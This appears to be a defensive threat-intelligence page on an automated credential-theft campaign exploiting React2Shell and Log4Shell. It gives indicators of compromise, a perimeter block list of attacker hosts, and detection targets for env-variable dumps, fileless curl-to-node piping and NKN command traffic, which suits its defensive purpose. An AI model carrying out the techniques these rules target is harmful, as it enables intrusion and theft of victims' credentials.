SOC Incident Toolkit
Back to Campaigns
Chinese Cybercrime Infrastructure: OpenClaw / Paperclip Operation

Chinese Cybercrime Infrastructure: OpenClaw / Paperclip Operation

OpenClawLog4ShellReact2ShellChinese Cybercrime

An automated Chinese cybercrime infrastructure blends large-scale exploitation with structured orchestration and direct monetization. Coordinated through a centralized backend and an agent-based workflow system, the operation conducts internet-scale reconnaissance via FOFA and 360Quake, exploits vulnerable web applications using React2Shell extracts AI API keys, Stripe credentials and database secrets, and immediately validates stolen data for financial gain. Primary targets are Web3 platforms, fintech services and cloud-native organizations.

Indicators of Compromise

Domains (3)

soft-silence-d978.13544681192.workers.devanson-aeromarine-ocularly.ngrok-free.devkf.unpkg.top

IPv4 (1)

124.220.164.14

Emails (3)

Notes

<span id="docs-internal-guid-cca61ee2-7fff-be44-1ed9-2f8e647a9417"><p style="line-height:1.2;margin-top:4pt;margin-bottom:4pt;"><span style="font-size: 10pt; font-family: Arial, sans-serif; color: rgb(0, 0, 0); background-color: transparent; font-variant: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="color: rgb(28, 40, 51); font-size: 21.3333px; font-weight: 700;">Conclusion </span> The OpenClaw / Paperclip infrastructure represents a maturation point in Chinese cybercrime operations — the transition from opportunistic, manual exploitation to a structured, workflow-driven attack platform with enterprise-grade operational management. The operation's combination of internet-scale reconnaissance, automated exploitation at hundreds of simultaneous targets, fileless C2 via decentralized NKN network, and immediate credential monetization creates an end-to-end cybercrime pipeline that is both highly scalable and difficult to detect with traditional security tools.</span></p><br><p style="line-height:1.2;margin-top:4pt;margin-bottom:4pt;"><span style="font-size: 10pt; font-family: Arial, sans-serif; color: rgb(0, 0, 0); background-color: transparent; font-variant: normal; vertical-align: baseline; white-space: pre-wrap;">Three aspects of this operation demand specific attention from defenders:</span></p><br><ul style="margin-top:0;margin-bottom:0;"><li style="list-style-type: disc; font-size: 10pt; font-family: Arial, sans-serif; color: rgb(0, 0, 0); background-color: transparent; font-variant: normal; vertical-align: baseline; white-space: pre;"><p style="line-height:1.2;margin-top:3pt;margin-bottom:3pt;" role="presentation"><span style="font-size: 10pt; background-color: transparent; font-weight: 700; font-variant: normal; vertical-align: baseline; white-space: pre-wrap;">The monetization layer is immediate. Stolen API keys are not bulk-dumped to dark web markets — they are validated and used or sold within hours. An organization that detects this exploitation pattern days after the fact should assume their Stripe, AI, and cloud credentials are already compromised and actively being monetized.</span></p></li><li style="list-style-type: disc; font-size: 10pt; font-family: Arial, sans-serif; color: rgb(0, 0, 0); background-color: transparent; font-variant: normal; vertical-align: baseline; white-space: pre;"><p style="line-height:1.2;margin-top:3pt;margin-bottom:3pt;" role="presentation"><span style="font-size: 10pt; background-color: transparent; font-weight: 700; font-variant: normal; vertical-align: baseline; white-space: pre-wrap;">The NKN-based fileless C2 is resistant to standard blocking. Domain and IP blacklists are ineffective against an agent that communicates via a decentralized blockchain P2P network and is delivered entirely in memory. Detection requires behavioral monitoring of process trees and network connections to nkn.org, not signature matching.</span></p></li><li style="list-style-type: disc; font-size: 10pt; font-family: Arial, sans-serif; color: rgb(0, 0, 0); background-color: transparent; font-variant: normal; vertical-align: baseline; white-space: pre;"><p style="line-height:1.2;margin-top:3pt;margin-bottom:3pt;" role="presentation"><span style="font-size: 10pt; background-color: transparent; font-weight: 700; font-variant: normal; vertical-align: baseline; white-space: pre-wrap;">Scale is the primary defense challenge. At ~45,000 exploitation attempts and 5,374 active backdoors, this operation is running at a volume that makes targeted response impractical. The actor is not hunting specific organizations — they are systematically compromising every publicly exposed vulnerable React and Java application they can find via FOFA. The correct defensive posture is eliminating the vulnerability, not monitoring for targeting.</span></p></li></ul><br><p style="line-height:1.2;margin-top:4pt;margin-bottom:4pt;"><span style="font-size: 10pt; font-family: Arial, sans-serif; color: rgb(0, 0, 0); background-color: transparent; font-variant: normal; vertical-align: baseline; white-space: pre-wrap;">Any organization operating in Web3, fintech, or cloud-native environments with publicly exposed React or Java applications should treat this threat as active and verified. The combination of FOFA visibility data and automated React2Shell/Log4Shell exploitation means unpatched applications will be found, exploited, and harvested on automated schedules. Patch application and .env secret migration are the only reliable mitigations.</span></p><div><span style="font-size: 10pt; font-family: Arial, sans-serif; color: rgb(0, 0, 0); background-color: transparent; font-variant: normal; vertical-align: baseline; white-space: pre-wrap;"><br></span></div></span>

Mitigation

<span style="color: rgb(28, 40, 51); font-family: Arial, sans-serif; font-size: 20px; font-weight: 700; white-space: pre-wrap;">Mitigation </span><span id="docs-internal-guid-56c72ee4-7fff-f789-8c31-3f7b3a7eeac3"><span id="docs-internal-guid-e415bd95-7fff-bdde-6453-dff671505f4a"><div style="margin-left:0pt;" align="left"><table style="border:none;border-collapse:collapse;"><colgroup><col><col></colgroup><thead><tr style="height:0pt;"><th style="border-left:solid #bdc3c7 0.5pt;border-right:solid #bdc3c7 0.5pt;border-bottom:solid #bdc3c7 0.5pt;border-top:solid #bdc3c7 0.5pt;vertical-align:top;background-color:#1a2533;padding:4pt 6pt 4pt 6pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.2;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(255, 255, 255); background-color: transparent; font-variant: normal; vertical-align: baseline; white-space: pre-wrap;">Priority</span></p></th><th style="border-left:solid #bdc3c7 0.5pt;border-right:solid #bdc3c7 0.5pt;border-bottom:solid #bdc3c7 0.5pt;border-top:solid #bdc3c7 0.5pt;vertical-align:top;background-color:#1a2533;padding:4pt 6pt 4pt 6pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.2;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(255, 255, 255); background-color: transparent; font-variant: normal; vertical-align: baseline; white-space: pre-wrap;">Action</span></p></th></tr></thead><tbody><tr style="height:0pt;"><td style="border-left:solid #bdc3c7 0.5pt;border-right:solid #bdc3c7 0.5pt;border-bottom:solid #bdc3c7 0.5pt;border-top:solid #bdc3c7 0.5pt;vertical-align:top;background-color:#c0392b;padding:4pt 6pt 4pt 6pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.2;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(255, 255, 255); background-color: transparent; font-weight: 700; font-variant: normal; vertical-align: baseline; white-space: pre-wrap;">CRITICAL</span></p></td><td style="border-width: 0.5pt; border-style: solid; border-color: rgb(189, 195, 199); vertical-align: top; padding: 4pt 6pt; overflow: hidden; overflow-wrap: break-word;"><p style="line-height:1.2;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(0, 0, 0); background-color: transparent; font-variant: normal; vertical-align: baseline; white-space: pre-wrap;">Patch CVE-2025-55182 &amp; CVE-2025-66478 (React2Shell) -- apply vendor advisory update across all React applications</span></p></td></tr><tr style="height:0pt;"><td style="border-left:solid #bdc3c7 0.5pt;border-right:solid #bdc3c7 0.5pt;border-bottom:solid #bdc3c7 0.5pt;border-top:solid #bdc3c7 0.5pt;vertical-align:top;background-color:#c0392b;padding:4pt 6pt 4pt 6pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.2;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(255, 255, 255); background-color: transparent; font-weight: 700; font-variant: normal; vertical-align: baseline; white-space: pre-wrap;">CRITICAL</span></p></td><td style="border-left:solid #bdc3c7 0.5pt;border-right:solid #bdc3c7 0.5pt;border-bottom:solid #bdc3c7 0.5pt;border-top:solid #bdc3c7 0.5pt;vertical-align:top;background-color:#f4f6f7;padding:4pt 6pt 4pt 6pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.2;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(0, 0, 0); background-color: transparent; font-variant: normal; vertical-align: baseline; white-space: pre-wrap;">Patch CVE-2021-44228 (Log4Shell) -- upgrade Log4j to 2.17.1+; disable JNDI lookups if patching is not immediately possible</span></p></td></tr><tr style="height:0pt;"><td style="border-left:solid #bdc3c7 0.5pt;border-right:solid #bdc3c7 0.5pt;border-bottom:solid #bdc3c7 0.5pt;border-top:solid #bdc3c7 0.5pt;vertical-align:top;background-color:#c0392b;padding:4pt 6pt 4pt 6pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.2;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(255, 255, 255); background-color: transparent; font-weight: 700; font-variant: normal; vertical-align: baseline; white-space: pre-wrap;">CRITICAL</span></p></td><td style="border-width: 0.5pt; border-style: solid; border-color: rgb(189, 195, 199); vertical-align: top; padding: 4pt 6pt; overflow: hidden; overflow-wrap: break-word;"><p style="line-height:1.2;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(0, 0, 0); background-color: transparent; font-variant: normal; vertical-align: baseline; white-space: pre-wrap;">Block at perimeter: 124[.]220[.]164[.]14 (all ports), *.nkn.org:30003, soft-silence-*.workers.dev, d6[.]tfdl[.]net, deltajohnsons[.]com</span></p></td></tr><tr style="height:0pt;"><td style="border-left:solid #bdc3c7 0.5pt;border-right:solid #bdc3c7 0.5pt;border-bottom:solid #bdc3c7 0.5pt;border-top:solid #bdc3c7 0.5pt;vertical-align:top;background-color:#c0392b;padding:4pt 6pt 4pt 6pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.2;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(255, 255, 255); background-color: transparent; font-weight: 700; font-variant: normal; vertical-align: baseline; white-space: pre-wrap;">CRITICAL</span></p></td><td style="border-left:solid #bdc3c7 0.5pt;border-right:solid #bdc3c7 0.5pt;border-bottom:solid #bdc3c7 0.5pt;border-top:solid #bdc3c7 0.5pt;vertical-align:top;background-color:#f4f6f7;padding:4pt 6pt 4pt 6pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.2;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(0, 0, 0); background-color: transparent; font-variant: normal; vertical-align: baseline; white-space: pre-wrap;">Close .env web access -- deny /.env, /api/.env paths in web server config; move secrets to Secrets Manager (Vault, AWS SM, Azure KV)</span></p></td></tr><tr style="height:0pt;"><td style="border-left:solid #bdc3c7 0.5pt;border-right:solid #bdc3c7 0.5pt;border-bottom:solid #bdc3c7 0.5pt;border-top:solid #bdc3c7 0.5pt;vertical-align:top;background-color:#c0392b;padding:4pt 6pt 4pt 6pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.2;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(255, 255, 255); background-color: transparent; font-weight: 700; font-variant: normal; vertical-align: baseline; white-space: pre-wrap;">CRITICAL</span></p></td><td style="border-width: 0.5pt; border-style: solid; border-color: rgb(189, 195, 199); vertical-align: top; padding: 4pt 6pt; overflow: hidden; overflow-wrap: break-word;"><p style="line-height:1.2;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(0, 0, 0); background-color: transparent; font-variant: normal; vertical-align: baseline; white-space: pre-wrap;">Rotate all exposed credentials: AI API keys (OpenAI, Anthropic, Gemini, DeepSeek), Stripe live keys, GitHub tokens, DB credentials</span></p></td></tr><tr style="height:0pt;"><td style="border-left:solid #bdc3c7 0.5pt;border-right:solid #bdc3c7 0.5pt;border-bottom:solid #bdc3c7 0.5pt;border-top:solid #bdc3c7 0.5pt;vertical-align:top;background-color:#e67e22;padding:4pt 6pt 4pt 6pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.2;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(255, 255, 255); background-color: transparent; font-weight: 700; font-variant: normal; vertical-align: baseline; white-space: pre-wrap;">HIGH</span></p></td><td style="border-left:solid #bdc3c7 0.5pt;border-right:solid #bdc3c7 0.5pt;border-bottom:solid #bdc3c7 0.5pt;border-top:solid #bdc3c7 0.5pt;vertical-align:top;background-color:#f4f6f7;padding:4pt 6pt 4pt 6pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.2;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(0, 0, 0); background-color: transparent; font-variant: normal; vertical-align: baseline; white-space: pre-wrap;">Update WAF rules: add React2Shell and Log4Shell JNDI blocking signatures; rate-limit IPs &gt;100 req/min</span></p></td></tr><tr style="height:0pt;"><td style="border-left:solid #bdc3c7 0.5pt;border-right:solid #bdc3c7 0.5pt;border-bottom:solid #bdc3c7 0.5pt;border-top:solid #bdc3c7 0.5pt;vertical-align:top;background-color:#e67e22;padding:4pt 6pt 4pt 6pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.2;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(255, 255, 255); background-color: transparent; font-weight: 700; font-variant: normal; vertical-align: baseline; white-space: pre-wrap;">HIGH</span></p></td><td style="border-width: 0.5pt; border-style: solid; border-color: rgb(189, 195, 199); vertical-align: top; padding: 4pt 6pt; overflow: hidden; overflow-wrap: break-word;"><p style="line-height:1.2;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(0, 0, 0); background-color: transparent; font-variant: normal; vertical-align: baseline; white-space: pre-wrap;">Deploy Sigma rules to SIEM: env variable dump from web process (CRITICAL), fileless curl|node pipe (HIGH), NKN outbound (HIGH)</span></p></td></tr><tr style="height:0pt;"><td style="border-left:solid #bdc3c7 0.5pt;border-right:solid #bdc3c7 0.5pt;border-bottom:solid #bdc3c7 0.5pt;border-top:solid #bdc3c7 0.5pt;vertical-align:top;background-color:#e67e22;padding:4pt 6pt 4pt 6pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.2;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(255, 255, 255); background-color: transparent; font-weight: 700; font-variant: normal; vertical-align: baseline; white-space: pre-wrap;">HIGH</span></p></td><td style="border-left:solid #bdc3c7 0.5pt;border-right:solid #bdc3c7 0.5pt;border-bottom:solid #bdc3c7 0.5pt;border-top:solid #bdc3c7 0.5pt;vertical-align:top;background-color:#f4f6f7;padding:4pt 6pt 4pt 6pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.2;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(0, 0, 0); background-color: transparent; font-variant: normal; vertical-align: baseline; white-space: pre-wrap;">Deploy YARA rules 7.1-7.4 to EDR/AV: React2Shell scripts, NKN agent, credential harvesting patterns, CF tunnel + P2P persistence</span></p></td></tr><tr style="height:0pt;"><td style="border-left:solid #bdc3c7 0.5pt;border-right:solid #bdc3c7 0.5pt;border-bottom:solid #bdc3c7 0.5pt;border-top:solid #bdc3c7 0.5pt;vertical-align:top;background-color:#e67e22;padding:4pt 6pt 4pt 6pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.2;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(255, 255, 255); background-color: transparent; font-weight: 700; font-variant: normal; vertical-align: baseline; white-space: pre-wrap;">HIGH</span></p></td><td style="border-width: 0.5pt; border-style: solid; border-color: rgb(189, 195, 199); vertical-align: top; padding: 4pt 6pt; overflow: hidden; overflow-wrap: break-word;"><p style="line-height:1.2;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(0, 0, 0); background-color: transparent; font-variant: normal; vertical-align: baseline; white-space: pre-wrap;">Audit FOFA / Shodan exposure: scan own ASN for publicly visible React and Java applications; restrict or take offline unnecessary ones</span></p></td></tr><tr style="height:0pt;"><td style="border-left:solid #bdc3c7 0.5pt;border-right:solid #bdc3c7 0.5pt;border-bottom:solid #bdc3c7 0.5pt;border-top:solid #bdc3c7 0.5pt;vertical-align:top;background-color:#1a5276;padding:4pt 6pt 4pt 6pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.2;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(255, 255, 255); background-color: transparent; font-weight: 700; font-variant: normal; vertical-align: baseline; white-space: pre-wrap;">MEDIUM</span></p></td><td style="border-left:solid #bdc3c7 0.5pt;border-right:solid #bdc3c7 0.5pt;border-bottom:solid #bdc3c7 0.5pt;border-top:solid #bdc3c7 0.5pt;vertical-align:top;background-color:#f4f6f7;padding:4pt 6pt 4pt 6pt;overflow:hidden;overflow-wrap:break-word;"><p style="line-height:1.2;margin-top:0pt;margin-bottom:0pt;"><span style="font-size: 9pt; font-family: Arial, sans-serif; color: rgb(0, 0, 0); background-color: transparent; font-variant: normal; vertical-align: baseline; white-space: pre-wrap;">Configure API usage alerts: set spend limits and anomaly alerts for all AI API keys; monitor OpenAI, Anthropic, and Stripe dashboards</span></p></td></tr></tbody></table></div></span></span><span style="color: rgb(28, 40, 51); font-family: Arial, sans-serif; font-size: 20px; font-weight: 700; white-space: pre-wrap;"></span>